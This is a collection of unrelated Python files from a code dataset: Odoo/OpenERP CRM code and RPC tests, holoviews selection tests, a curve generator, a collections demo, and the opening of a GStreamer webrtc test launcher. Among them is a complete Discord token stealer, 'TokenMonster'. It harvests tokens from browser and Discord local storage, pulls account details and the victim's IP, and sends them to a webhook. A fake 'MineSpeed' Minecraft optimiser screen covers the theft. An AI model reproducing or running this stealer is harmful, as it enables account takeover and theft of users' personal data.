3371666 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class crm_partner_binding(osv.osv_memory):
    """
    Handle the partner binding or generation in any CRM wizard that requires
    such feature, like the lead2opportunity wizard, or the
    phonecall2opportunity wizard. Try to find a matching partner from the
    CRM model's information (name, email, phone number, etc) or create a new
    one on the fly.
    Use it like a mixin with the wizard of your choice.
    """
    _name = 'crm.partner.binding'
    _description = 'Handle partner binding or generation in CRM wizards.'
    _columns = {
        'action': fields.selection([
                ('exist', 'Link to an existing customer'),
                ('create', 'Create a new customer'),
                ('nothing', 'Do not link to a customer')
            ], 'Related Customer', required=True),
        'partner_id': fields.many2one('res.partner', 'Customer'),
    }

    def _find_matching_partner(self, cr, uid, context=None):
        """
        Try to find a matching partner regarding the active model data, like
        the customer's name, email, phone number, etc.
        :return int partner_id if any, False otherwise
        """
        if context is None:
            context = {}
        partner_id = False
        partner_obj = self.pool.get('res.partner')

        # The active model has to be a lead or a phonecall. Default to None so
        # the check below is safe when the context carries neither model.
        # BUGFIX: active_model was previously left undefined in that case,
        # making the `if (active_model)` test raise a NameError.
        active_model = None
        if (context.get('active_model') == 'crm.lead') and context.get('active_id'):
            active_model = self.pool.get('crm.lead').browse(cr, uid, context.get('active_id'), context=context)
        elif (context.get('active_model') == 'crm.phonecall') and context.get('active_id'):
            active_model = self.pool.get('crm.phonecall').browse(cr, uid, context.get('active_id'), context=context)

        # Find the best matching partner for the active model
        if (active_model):
            partner_obj = self.pool.get('res.partner')
            # A partner is set already
            if active_model.partner_id:
                partner_id = active_model.partner_id.id
            # Search through the existing partners based on the lead's email
            elif active_model.email_from:
                partner_ids = partner_obj.search(cr, uid, [('email', '=', active_model.email_from)], context=context)
                if partner_ids:
                    partner_id = partner_ids[0]
            # Search through the existing partners based on the lead's partner or contact name
            elif active_model.partner_name:
                partner_ids = partner_obj.search(cr, uid, [('name', 'ilike', '%'+active_model.partner_name+'%')], context=context)
                if partner_ids:
                    partner_id = partner_ids[0]
            elif active_model.contact_name:
                partner_ids = partner_obj.search(cr, uid, [
                        ('name', 'ilike', '%'+active_model.contact_name+'%')], context=context)
                if partner_ids:
                    partner_id = partner_ids[0]
        return partner_id

    def default_get(self, cr, uid, fields, context=None):
        """Pre-fill the wizard: link to the matched partner when one exists,
        otherwise default the action to creating a new customer."""
        res = super(crm_partner_binding, self).default_get(cr, uid, fields, context=context)
        partner_id = self._find_matching_partner(cr, uid, context=context)
        if 'action' in fields:
            res['action'] = partner_id and 'exist' or 'create'
        if 'partner_id' in fields:
            res['partner_id'] = partner_id
        return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| StarcoderdataPython |
1715326 | from unittest import SkipTest, skip, skipIf
import holoviews as hv
import pandas as pd
from holoviews.core.options import Store
from holoviews.selection import link_selections
from holoviews.element.comparison import ComparisonTestCase
try:
from holoviews.operation.datashader import datashade, dynspread
except:
datashade = None
ds_skip = skipIf(datashade is None, "Datashader not available")
class TestLinkSelections(ComparisonTestCase):
    """Backend-agnostic tests for ``holoviews.selection.link_selections``.

    Concrete subclasses pin a plotting backend and implement
    ``element_color``/``element_visible`` so the shared assertions here can
    inspect how each backend styles selected vs. unselected data.
    """

    def setUp(self):
        if type(self) is TestLinkSelections:
            # Only run tests in subclasses
            raise SkipTest("Not supported")

        # Three points with x/y coordinates plus an error column ``e``.
        self.data = pd.DataFrame(
            {'x': [1, 2, 3],
             'y': [0, 3, 2],
             'e': [1, 1.5, 2],
             },
            columns=['x', 'y', 'e']
        )

    def element_color(self, element):
        # Backend-specific: return the color option applied to *element*.
        raise NotImplementedError

    def element_visible(self, element):
        # Backend-specific: return whether *element* is rendered visible.
        raise NotImplementedError

    def check_base_scatter_like(self, base_scatter, lnk_sel, data=None):
        """Assert the base (background) layer is visible, colored with the
        unselected color, and carries *data* (defaults to the full dataset)."""
        if data is None:
            data = self.data

        self.assertEqual(
            self.element_color(base_scatter),
            lnk_sel.unselected_color
        )
        self.assertTrue(self.element_visible(base_scatter))
        self.assertEqual(base_scatter.data, data)

    def check_overlay_scatter_like(self, overlay_scatter, lnk_sel, data):
        """Assert the selection overlay carries *data* in the selected color.

        The overlay is only visible when the selection is a proper subset of
        the full dataset.
        """
        self.assertEqual(
            self.element_color(overlay_scatter),
            lnk_sel.selected_color
        )
        self.assertEqual(
            self.element_visible(overlay_scatter),
            len(data) != len(self.data)
        )
        self.assertEqual(overlay_scatter.data, data)

    def test_scatter_selection(self, dynamic=False):
        scatter = hv.Scatter(self.data, kdims='x', vdims='y')
        if dynamic:
            # Convert scatter to DynamicMap that returns the element
            scatter = hv.util.Dynamic(scatter)

        lnk_sel = link_selections.instance()
        linked = lnk_sel(scatter)
        current_obj = linked[()]

        # Check initial state of linked dynamic map
        self.assertIsInstance(current_obj, hv.Overlay)

        # Check initial base layer
        self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)

        # Check selection layer
        self.check_overlay_scatter_like(current_obj.Scatter.II, lnk_sel, self.data)

        # Perform selection of second and third point
        boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
        self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
        boundsxy.event(bounds=(0, 1, 5, 5))
        current_obj = linked[()]

        # Check that base layer is unchanged
        self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)

        # Check selection layer
        self.check_overlay_scatter_like(current_obj.Scatter.II, lnk_sel, self.data.iloc[1:])

    def test_scatter_selection_dynamic(self):
        self.test_scatter_selection(dynamic=True)

    def test_layout_selection_scatter_table(self):
        scatter = hv.Scatter(self.data, kdims='x', vdims='y')
        table = hv.Table(self.data)
        lnk_sel = link_selections.instance()
        linked = lnk_sel(scatter + table)

        current_obj = linked[()]

        # Check initial base scatter
        self.check_base_scatter_like(
            current_obj[0][()].Scatter.I,
            lnk_sel
        )

        # Check initial selection scatter
        self.check_overlay_scatter_like(
            current_obj[0][()].Scatter.II,
            lnk_sel,
            self.data
        )

        # Check initial table: every row rendered in the unselected color.
        self.assertEqual(
            self.element_color(current_obj[1][()]),
            [lnk_sel.unselected_color] * len(self.data)
        )

        # Select first and third point
        boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
        boundsxy.event(bounds=(0, 0, 4, 2))
        current_obj = linked[()]

        # Check base scatter
        self.check_base_scatter_like(
            current_obj[0][()].Scatter.I,
            lnk_sel
        )

        # Check selection scatter
        self.check_overlay_scatter_like(
            current_obj[0][()].Scatter.II,
            lnk_sel,
            self.data.iloc[[0, 2]]
        )

        # Check selected table: per-row colors follow the selection.
        self.assertEqual(
            self.element_color(current_obj[1][()]),
            [
                lnk_sel.selected_color,
                lnk_sel.unselected_color,
                lnk_sel.selected_color,
            ]
        )

    def test_overlay_scatter_errorbars(self, dynamic=False):
        scatter = hv.Scatter(self.data, kdims='x', vdims='y')
        error = hv.ErrorBars(self.data, kdims='x', vdims=['y', 'e'])
        lnk_sel = link_selections.instance()
        overlay = scatter * error
        if dynamic:
            overlay = hv.util.Dynamic(overlay)

        linked = lnk_sel(overlay)
        current_obj = linked[()]

        # Check initial base layers
        self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
        self.check_base_scatter_like(current_obj.ErrorBars.I, lnk_sel)

        # Check initial selection layers
        self.check_overlay_scatter_like(
            current_obj.Scatter.II, lnk_sel, self.data
        )
        self.check_overlay_scatter_like(
            current_obj.ErrorBars.II, lnk_sel, self.data
        )

        # Select first and third point
        boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
        boundsxy.event(bounds=(0, 0, 4, 2))
        current_obj = linked[()]

        # Check base layers haven't changed
        self.check_base_scatter_like(current_obj.Scatter.I, lnk_sel)
        self.check_base_scatter_like(current_obj.ErrorBars.I, lnk_sel)

        # Check selected layers
        self.check_overlay_scatter_like(
            current_obj.Scatter.II, lnk_sel, self.data.iloc[[0, 2]]
        )
        self.check_overlay_scatter_like(
            current_obj.ErrorBars.II, lnk_sel, self.data.iloc[[0, 2]]
        )

    def test_overlay_scatter_errorbars_dynamic(self):
        self.test_overlay_scatter_errorbars(dynamic=True)

    @ds_skip
    def test_datashade_selection(self):
        scatter = hv.Scatter(self.data, kdims='x', vdims='y')
        layout = scatter + dynspread(datashade(scatter))

        lnk_sel = link_selections.instance()
        linked = lnk_sel(layout)
        current_obj = linked[()]

        # Check base scatter layer
        self.check_base_scatter_like(current_obj[0][()].Scatter.I, lnk_sel)

        # Check selection layer
        self.check_overlay_scatter_like(
            current_obj[0][()].Scatter.II, lnk_sel, self.data
        )

        # Check RGB base layer: shaded with the unselected cmap, opaque.
        self.assertEqual(
            current_obj[1][()].RGB.I,
            dynspread(
                datashade(scatter, cmap=lnk_sel.unselected_cmap, alpha=255)
            )[()]
        )

        # Check RGB selection layer: fully transparent while nothing is selected.
        self.assertEqual(
            current_obj[1][()].RGB.II,
            dynspread(
                datashade(scatter, cmap=lnk_sel.selected_cmap, alpha=0)
            )[()]
        )

        # Perform selection of second and third point
        boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
        self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
        boundsxy.event(bounds=(0, 1, 5, 5))
        current_obj = linked[()]

        # Check that base scatter layer is unchanged
        self.check_base_scatter_like(current_obj[0][()].Scatter.I, lnk_sel)

        # Check scatter selection layer
        self.check_overlay_scatter_like(
            current_obj[0][()].Scatter.II, lnk_sel, self.data.iloc[1:]
        )

        # Check that base RGB layer is unchanged
        self.assertEqual(
            current_obj[1][()].RGB.I,
            dynspread(
                datashade(scatter, cmap=lnk_sel.unselected_cmap, alpha=255)
            )[()]
        )

        # Check selection RGB layer: now shades only the selected rows.
        self.assertEqual(
            current_obj[1][()].RGB.II,
            dynspread(
                datashade(
                    scatter.iloc[1:], cmap=lnk_sel.selected_cmap, alpha=255
                )
            )[()]
        )

    def test_scatter_selection_streaming(self):
        # Start with only the first two rows buffered.
        buffer = hv.streams.Buffer(self.data.iloc[:2], index=False)
        scatter = hv.DynamicMap(hv.Scatter, streams=[buffer])
        lnk_sel = link_selections.instance()
        linked = lnk_sel(scatter)

        # Perform selection of first and (future) third point
        boundsxy = lnk_sel._selection_expr_streams[0]._source_streams[0]
        self.assertIsInstance(boundsxy, hv.streams.BoundsXY)
        boundsxy.event(bounds=(0, 0, 4, 2))
        current_obj = linked[()]

        # Check initial base layer
        self.check_base_scatter_like(
            current_obj.Scatter.I, lnk_sel, self.data.iloc[:2]
        )

        # Check selection layer
        self.check_overlay_scatter_like(
            current_obj.Scatter.II, lnk_sel, self.data.iloc[[0]]
        )

        # Now stream third point to the DynamicMap
        buffer.send(self.data.iloc[[2]])
        current_obj = linked[()]

        # Check initial base layer
        self.check_base_scatter_like(
            current_obj.Scatter.I, lnk_sel, self.data
        )

        # Check selection layer: the streamed row matches the prior selection.
        self.check_overlay_scatter_like(
            current_obj.Scatter.II, lnk_sel, self.data.iloc[[0, 2]]
        )
# Backend implementations
class TestLinkSelectionsPlotly(TestLinkSelections):
    """Runs the shared link_selections tests against the plotly backend."""

    def setUp(self):
        try:
            import holoviews.plotting.plotly # noqa
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer swallowed while probing for plotly.
            raise SkipTest("Plotly selection tests require plotly.")

        super(TestLinkSelectionsPlotly, self).setUp()
        self._backend = Store.current_backend
        Store.set_current_backend('plotly')

    def tearDown(self):
        # Restore whatever backend was active before setUp switched it.
        Store.current_backend = self._backend

    def element_color(self, element):
        """Return the color (fill for tables) plotly applied to *element*;
        vectorized colors are returned as a list."""
        if isinstance(element, hv.Table):
            color = element.opts.get('style').kwargs['fill']
        else:
            color = element.opts.get('style').kwargs['color']

        if isinstance(color, str):
            return color
        else:
            return list(color)

    def element_visible(self, element):
        return element.opts.get('style').kwargs['visible']
class TestLinkSelectionsBokeh(TestLinkSelections):
    """Runs the shared link_selections tests against the bokeh backend."""

    def setUp(self):
        try:
            import holoviews.plotting.bokeh # noqa
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer swallowed while probing for bokeh.
            raise SkipTest("Bokeh selection tests require bokeh.")

        super(TestLinkSelectionsBokeh, self).setUp()
        self._backend = Store.current_backend
        Store.set_current_backend('bokeh')

    def tearDown(self):
        # Restore whatever backend was active before setUp switched it.
        Store.current_backend = self._backend

    def element_color(self, element):
        """Return the bokeh color option of *element*; vectorized colors are
        returned as a list."""
        color = element.opts.get('style').kwargs['color']

        if isinstance(color, str):
            return color
        else:
            return list(color)

    def element_visible(self, element):
        # Bokeh exposes no visibility flag; fully transparent counts as hidden.
        return element.opts.get('style').kwargs['alpha'] > 0

    @skip("Coloring Bokeh table not yet supported")
    def test_layout_selection_scatter_table(self):
        pass

    @skip("Bokeh ErrorBars selection not yet supported")
    def test_overlay_scatter_errorbars(self):
        pass

    @skip("Bokeh ErrorBars selection not yet supported")
    def test_overlay_scatter_errorbars_dynamic(self):
        pass
| StarcoderdataPython |
3315617 | <reponame>mrkraimer/testPvaPy
# GenerateCurve.py
import numpy as np
import sys
def getCurveNames():
    """Return the names of every curve that generateCurve() understands."""
    names = (
        "line",
        "circle",
        "ellipse",
        "clover",
        "heart",
        "lissajous",
        "figureight",
    )
    return names
def generateCurve(argv):
    """Build a named 2-D parametric curve from command-line style arguments.

    *argv* mirrors ``sys.argv``: ``argv[1]`` is the curve name (one of
    ``getCurveNames()``); ``argv[2]``/``argv[3]`` are optional float
    parameters for the curves that take them (ellipse, clover, lissajous,
    figureight).

    Returns a dict ``{"x": ndarray, "y": ndarray, "name": str}``.
    Prints the valid names and exits when called with no curve name;
    raises ``Exception`` for an unknown name.

    Fix: all arguments are now read from the *argv* parameter instead of
    ``sys.argv``, so the function works with argument lists other than the
    process's own.
    """
    nargs = len(argv)
    if nargs == 1:
        print('argument must be one of: ', getCurveNames())
        exit()
    if nargs < 2:
        raise Exception('must specify curve name')
    name = argv[1]

    def unit_param(npts):
        # t sampled on [0, 1) at npts points — identical to the per-branch
        # min/max/inc arithmetic the original duplicated in every curve.
        return np.arange(0.0, 1.0, 1.0 / npts)

    def opt_float(index, default):
        # Optional positional parameter parsed as float, with a default.
        return float(argv[index]) if nargs > index else default

    if name == "line":
        npts = 1000
        x = np.arange(npts, dtype="float64")
        y = np.arange(npts, dtype="float64")
        return {"x": x, "y": y, "name": name}
    if name == "circle":
        t = unit_param(2000)
        x = np.cos(2 * np.pi * t)
        y = np.sin(2 * np.pi * t)
        return {"x": x, "y": y, "name": name}
    if name == "ellipse":
        t = unit_param(2000)
        a = opt_float(2, 3.0)  # semi-axis along x
        b = opt_float(3, 2.0)  # semi-axis along y
        x = a * np.cos(2 * np.pi * t)
        y = b * np.sin(2 * np.pi * t)
        return {"x": x, "y": y, "name": name}
    if name == "clover":
        t = unit_param(2000)
        nloops = opt_float(2, 3)  # number of petals
        print('nloops=', nloops)
        x = np.sin(nloops * 2 * np.pi * t) * np.cos(2 * np.pi * t)
        y = np.sin(nloops * 2 * np.pi * t) * np.sin(2 * np.pi * t)
        return {"x": x, "y": y, "name": name}
    if name == "heart":
        t = unit_param(2000)
        c = np.cos(2 * np.pi * t)
        s = np.sin(2 * np.pi * t)
        x = (1.0 - c * c) * s
        y = (1.0 - c * c * c) * c
        return {"x": x, "y": y, "name": name}
    if name == "lissajous":
        t = unit_param(4000)
        m = opt_float(2, 3)  # y frequency
        n = opt_float(3, 1)  # x frequency
        x = np.sin(n * 2 * np.pi * t)
        y = np.cos(m * 2 * np.pi * t)
        return {"x": x, "y": y, "name": name}
    if name == "figureight":
        t = unit_param(2000)
        a = opt_float(2, 1)  # overall scale
        print('a=', a)
        x = a * np.sin(2 * np.pi * t) * np.cos(2 * np.pi * t)
        y = a * np.sin(2 * np.pi * t)
        return {"x": x, "y": y, "name": name}
    raise Exception(name + ' not implemented')
if __name__ == '__main__':
    # Smoke test: build the curve named on the command line and report the
    # sizes of the generated coordinate arrays.
    curveData = generateCurve(sys.argv)
    print('name=',curveData["name"],' len(x)=',len(curveData["x"]),' len(y)=',len(curveData["y"]))
| StarcoderdataPython |
1684061 | <gh_stars>1-10
from unittest import TestCase
from core.odoorpc import OdooRPC
from core.models import Version
from config import ODOO_TEST_URL, ODOO_TEST_DB, ODOO_TEST_USERNAME, ODOO_TEST_PASSWORD
class OdooRPCTest(TestCase):
    """Integration tests for core.odoorpc.OdooRPC against a live Odoo test server.

    The connection settings come from config.py (ODOO_TEST_*). Several
    assertions depend on the fixture data present in the test database
    (e.g. exactly one company partner) — TODO confirm against the fixtures.

    NOTE(review): the client is created in __init__ rather than
    setUp/setUpClass, so it is rebuilt per constructed test instance and a
    connection failure surfaces at construction time — confirm intentional.
    """

    def __init__(self, *args, **kwargs):
        super(OdooRPCTest, self).__init__(*args, **kwargs)
        # Client pointed at the configured test database.
        self.odoo = OdooRPC(
            ODOO_TEST_URL,
            ODOO_TEST_DB,
            ODOO_TEST_USERNAME,
            ODOO_TEST_PASSWORD,
        )

    def test_version(self):
        # version() wraps the server version info in a Version model.
        result = self.odoo.version()
        self.assertEqual(type(result), Version)

    def test_authenticate(self):
        # authenticate() returns the numeric uid of the logged-in user.
        result = self.odoo.authenticate()
        self.assertEqual(type(result), int)

    def test_check_access_right(self):
        result = self.odoo.check_access_rights("res.partner", ["read"])
        self.assertEqual(result, True)

    def test_search(self):
        # search() returns a list of matching record ids.
        result = self.odoo.search("res.partner")
        self.assertEqual(type(result), list)

    def test_search_limit(self):
        result = self.odoo.search("res.partner", limit=1)
        self.assertEqual(len(result), 1)

    def test_search_domain(self):
        # Assumes the test DB holds exactly one company partner.
        result = self.odoo.search("res.partner", domain=[
            ["is_company", "=", True]])
        self.assertEqual(len(result), 1)

    def test_search_read(self):
        # search_read() returns a list of record dicts.
        result = self.odoo.search_read("res.partner")
        self.assertEqual(type(result), list)

    def test_search_read_limit(self):
        result = self.odoo.search_read("res.partner", limit=1)
        self.assertEqual(len(result), 1)

    def test_search_read_domain(self):
        # Assumes the test DB holds exactly one company partner.
        result = self.odoo.search_read(
            "res.partner", domain=[["is_company", "=", True]])
        self.assertEqual(len(result), 1)

    def test_search_read_fields(self):
        # 'id' is always returned in addition to the requested fields.
        result = self.odoo.search_read(
            "res.partner", fields=["name", "email"], limit=1)
        self.assertEqual(str(result[0].keys()),
                         "dict_keys(['id', 'name', 'email'])")

    def test_read(self):
        # read() fetches specific records by id.
        result = self.odoo.read("res.partner", [3], fields=["name", "email"])
        self.assertEqual(len(result), 1)
        self.assertEqual(str(result[0].keys()),
                         "dict_keys(['id', 'name', 'email'])")

    def test_fields_get(self):
        # fields_get() returns the model's field metadata as a dict.
        result = self.odoo.fields_get("res.partner")
        self.assertEqual(type(result), dict)

    def test_create_write_unlink(self):
        # Full lifecycle: create a partner, update it, then delete it.
        id = self.odoo.create("res.partner", {
            "name": "<NAME>"
        })
        self.assertEqual(type(id), int)

        result = self.odoo.write("res.partner", id, {
            "name": "<NAME>",
            "email": "<EMAIL>",
        })
        self.assertEqual(result, True)

        result_delete = self.odoo.unlink("res.partner", id)
        self.assertEqual(result_delete, True)
| StarcoderdataPython |
3271188 | import os
import re
import json
import requests
import colorama
from time import sleep
from alive_progress import alive_bar
if 'PYCHARM_HOSTED' in os.environ:
convert = False
strip = False
else:
convert = None
strip = None
colorama.init(
convert=convert,
strip=strip
)
config = {
'WEBHOOK': True,
'WEBHOOK_URL': "<YOUR DISCORD WEBHOOK URL>",
'GUI': False,
'API_SEND': False,
'API_SEND_URL': "<YOUR_API_URL>"
}
class TokenMonster:
_pc_user = os.getlogin();
_pc_roaming = None
_pc_local = None
_tokens = []
def __init__(self):
if os.name != 'nt':
exit()
self._pc_roaming = os.getenv('APPDATA')
self._pc_local = os.getenv('LOCALAPPDATA')
self._scrape_tokens()
for token in self._tokens:
raw_user_data = self._retrieve(token)
user_json_str = json.dumps(raw_user_data)
user = json.loads(user_json_str)
if "username" in user:
if config["WEBHOOK"]:
webhook_data = {"username": "TokenMonster", "embeds": [
dict(title="Grabbed " + user['username'] + "'s token",
description="Token Monster has sniped an account at " + self._network_address() + " on " + self._pc_user,
color="4063108",
fields=[
{
"name": "💳 ID",
"value": "`" + user["id"] + "`",
"inline": False,
},
{
"name": "🧔 Username",
"value": "`" + user["username"] + "`",
"inline": False,
},
{
"name": "🎫 Tag",
"value": "`" + user["discriminator"] + "`",
"inline": False,
},
{
"name": "🏁 Locale",
"value": "`" + user["locale"] + "`",
"inline": False,
},
{
"name": "🔐 MFA Enabled?",
"value": "`" + str(user["mfa_enabled"]) + "`",
"inline": False,
},
{
"name": "📬 Email",
"value": "`" + user["email"] + "`",
"inline": False,
},
{
"name": "☎️ Phone Number",
"value": "`" + str(user["phone"]) + "`",
"inline": False,
},
{
"name": "💰 Token",
"value": "`" + token + "`",
"inline": False,
}
])
]}
result = requests.post(config["WEBHOOK_URL"], json=webhook_data)
if config["API_SEND_URL"]:
payload = {
'user_id': user["id"],
'username': user["username"],
'tag': user["discriminator"],
'locale': user["locale"],
'mfa': str(user["mfa_enabled"]),
'email': user["email"],
'phone': str(user["phone"]),
'token': user["token"]
}
requests.post(config["API_SEND_URL"], data=payload)
self._tokens.remove(token)
if config["GUI"]:
self._display_fake_prompt()
def _scrape_tokens(self):
crawl = {
'Discord': self._pc_roaming + '\\discord\\Local Storage\\leveldb\\',
'Chrome': self._pc_local + '\\google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self._pc_local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self._pc_local + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Opera': self._pc_roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\'
}
for source, path in crawl.items():
if not os.path.exists(path):
continue
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
self._tokens.append(token)
def _retrieve(self, token, content_type="application/json"):
header_data = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
"Authorization": token
}
return requests.get('https://discordapp.com/api/v9/users/@me', headers=header_data).json()
def _network_address(self):
ip = requests.get('https://api.ipify.org?format=json').json()
if ip:
ip_raw = json.dumps(ip)
user_ip = json.loads(ip_raw)
return user_ip["ip"]
else:
return False
def _display_fake_prompt(self):
display_string = """
---------------------------------------------------------------
███╗ ███╗██╗███╗ ██╗███████╗███████╗██████╗ ███████╗███████╗██████╗
████╗ ████║██║████╗ ██║██╔════╝██╔════╝██╔══██╗██╔════╝██╔════╝██╔══██╗
██╔████╔██║██║██╔██╗ ██║█████╗ ███████╗██████╔╝█████╗ █████╗ ██║ ██║
██║╚██╔╝██║██║██║╚██╗██║██╔══╝ ╚════██║██╔═══╝ ██╔══╝ ██╔══╝ ██║ ██║
██║ ╚═╝ ██║██║██║ ╚████║███████╗███████║██║ ███████╗███████╗██████╔╝
╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚══════╝╚══════╝╚═════╝
----------------------------------------------------------------
@Package: MineSpeed
@Version: 1.0.1
@Description: Improve your Minecraft client speed. :D
----------------------------------------------------------------
"""
print(colorama.Fore.LIGHTGREEN_EX + display_string)
if self.has_internet():
print(colorama.Fore.WHITE + "Download latest injection package...")
sleep(2)
print(colorama.Fore.GREEN + "Locating Minecraft Client runtime...")
sleep(3)
print(colorama.Fore.BLUE + "Injecting package, this may take a while...")
sleep(6)
print(colorama.Fore.GREEN + "Re-Compiling Client runtime...")
sleep(3)
print(colorama.Fore.CYAN + "Testing package and cleaning things up...")
with alive_bar(100) as bar:
for i in range(100):
sleep(0.08)
bar()
os.system('cls' if os.name == 'nt' else 'clear')
print(
colorama.Fore.WHITE + "All done! Your Minecraft game should run at least 2x faster than normal. If you didn't notice any improvements, let us know!")
print(colorama.Fore.MAGENTA + "Thank you for using this tool! :))")
os.system("pause")
else:
print(colorama.Fore.RED + 'You are offline, restart MineSpeed by pressing any key, and reconnect to '
'the internet.\n')
os.system("pause")
def has_internet(self):
try:
response = requests.get('https://www.google.com/')
return True
except:
return False
init = TokenMonster()
| StarcoderdataPython |
4807449 | #collections.py
# Demo script: a quick tour of the ``collections`` module containers.
from collections import ChainMap

# ChainMap: a single view over several dicts, searched left to right.
car_parts = {'hood': 500, 'engine': 5000, 'front_door': 750}
car_options = {'A/C': 1000, 'Turbo': 2500, 'rollbar': 300}
car_accessories = {'cover': 100, 'hood_ornament': 150, 'seat_cover': 99}
car_pricing = ChainMap(car_accessories, car_options, car_parts)
print (car_pricing['A/C'])
# 1000

from collections import Counter

# Counter: multiset counting each character of the string.
counter = Counter('superflous')
print(counter.elements())
# <itertools.chain object at 0x10989f490>  (elements() is lazy)
print(list(counter.elements()))
# ['s', 's', 'u', 'u', 'p', 'e', 'r', 'f', 'l', 'o']

from collections import defaultdict

# defaultdict: missing keys are created via the factory (here always "Monkey").
animal = defaultdict(lambda: "Monkey")
animal['Sam'] = 'Tiger'
print(animal['Nick'])
# Monkey
print(animal)
# defaultdict(<function <lambda> at 0x10e834280>, {'Sam': 'Tiger', 'Nick': 'Monkey'})

from collections import deque

import string

# deque: O(1) appends/pops at both ends, plus rotation.
d = deque(string.ascii_lowercase)
for letter in d:
    print(letter)
d.append('right')
print(d)
# deque(['a', 'b', ..., 'y', 'z', 'right'])
d.appendleft('left')
print(d)
# deque(['left', 'a', 'b', ..., 'y', 'z', 'right'])
d.rotate(1)
print(d)
# rotate(1) moves the last element to the front:
# deque(['right', 'left', 'a', 'b', ..., 'y', 'z'])

from collections import namedtuple

# namedtuple: lightweight immutable record with named fields.
Parts = namedtuple('Parts', 'id_num desc cost amount')
auto_parts = Parts(id_num='1234', desc='Ferrari', cost=123, amount=10)
print(auto_parts.desc)
# Ferrari

from collections import OrderedDict

# OrderedDict built from the items sorted by key.
d = {'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2}
new_ordered_dict = OrderedDict(sorted(d.items()))
print(new_ordered_dict)
3275032 | <filename>check/validate/apps/gstwebrtc.py
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301, USA.
import inspect
import itertools
import os
import shutil
import socket
import subprocess
import sys
import tempfile
import time

from launcher.baseclasses import TestsManager, GstValidateTest, ScenarioManager
from launcher.utils import DEFAULT_TIMEOUT, kill_subprocess
# Browsers every test is instantiated against.
DEFAULT_BROWSERS = ['firefox', 'chrome']

# list of scenarios. These are the names of the actual scenario files stored
# on disk.
DEFAULT_SCENARIOS = [
    "offer_answer",
    "vp8_send_stream",
    "open_data_channel",
    "send_data_channel_string",
]

# various configuration changes that are included from other scenarios.
# key is the name of the override used in the name of the test
# value is the subdirectory where the override is placed
# changes some things about the test like:
#  - who initiates the negotiation
#  - bundle settings
SCENARIO_OVERRIDES = {
    # name : directory
    # who starts the negotiation
    'local' : 'local_initiates_negotiation',
    'remote' : 'remote_initiates_negotiation',

    # bundle-policy configuration
    # XXX: webrtcbin's bundle-policy=none is not part of the spec
    'none_compat' : 'bundle_local_none_remote_max_compat',
    'none_balanced' : 'bundle_local_none_remote_balanced',
    'none_bundle' : 'bundle_local_none_remote_max_bundle',
    'compat_compat' : 'bundle_local_max_compat_remote_max_compat',
    'compat_balanced' : 'bundle_local_max_compat_remote_balanced',
    'compat_bundle' : 'bundle_local_max_compat_remote_max_bundle',
    'balanced_compat' : 'bundle_local_balanced_remote_max_compat',
    'balanced_balanced' : 'bundle_local_balanced_remote_balanced',
    'balanced_bundle' : 'bundle_local_balanced_remote_bundle',
    'bundle_compat' : 'bundle_local_max_bundle_remote_max_compat',
    'bundle_balanced' : 'bundle_local_max_bundle_remote_balanced',
    'bundle_bundle' : 'bundle_local_max_bundle_remote_max_bundle',
}

# The three bundle policies webrtcbin's peers can be configured with.
bundle_options = ['compat', 'balanced', 'bundle']

# Given an override, these are the choices to choose from.  Each choice is a
# separate test
OVERRIDE_CHOICES = {
    'initiator' : ['local', 'remote'],
    # Cartesian product of local x remote bundle policies, e.g. 'none_compat'.
    'bundle' : ['_'.join(opt) for opt in itertools.product(['none'] + bundle_options, bundle_options)],
}

# Which scenarios support which override. All the overrides will be chosen
SCENARIO_OVERRIDES_SUPPORTED = {
